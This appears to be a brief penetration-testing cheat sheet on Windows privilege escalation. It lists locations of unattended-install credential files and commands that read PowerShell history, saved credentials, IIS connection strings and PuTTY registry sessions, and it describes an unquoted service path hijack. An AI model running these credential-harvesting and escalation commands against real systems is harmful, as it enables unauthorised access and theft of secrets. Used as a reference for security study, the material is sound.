Privilege Escalation
Windows Privilege Escalation methods
Harvest credentials from unattended intallation
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
Check Powershell History
cmd.exe %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txtSaved Windows Credentials
cmdkey /listrunas /savecred /user:admin cmd.exeDatabase credentials from IIS settings
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionStringPutty Credentials
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /sScheduled Tasks
Manipulate binary or task to have it run as privileged user
Windows Services
Services stored in HKLM\SYSTEM\CurrentControlSet\Services\
Unquoted binary path exploitation Example: BINARY_PATH_NAME: C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
If we add a C:\MyPrograms\Disk.exe binary, it will be started as a service
Linux SUID Info: https://gtfobins.github.io/gtfobins/python/#suid
Tools
Last updated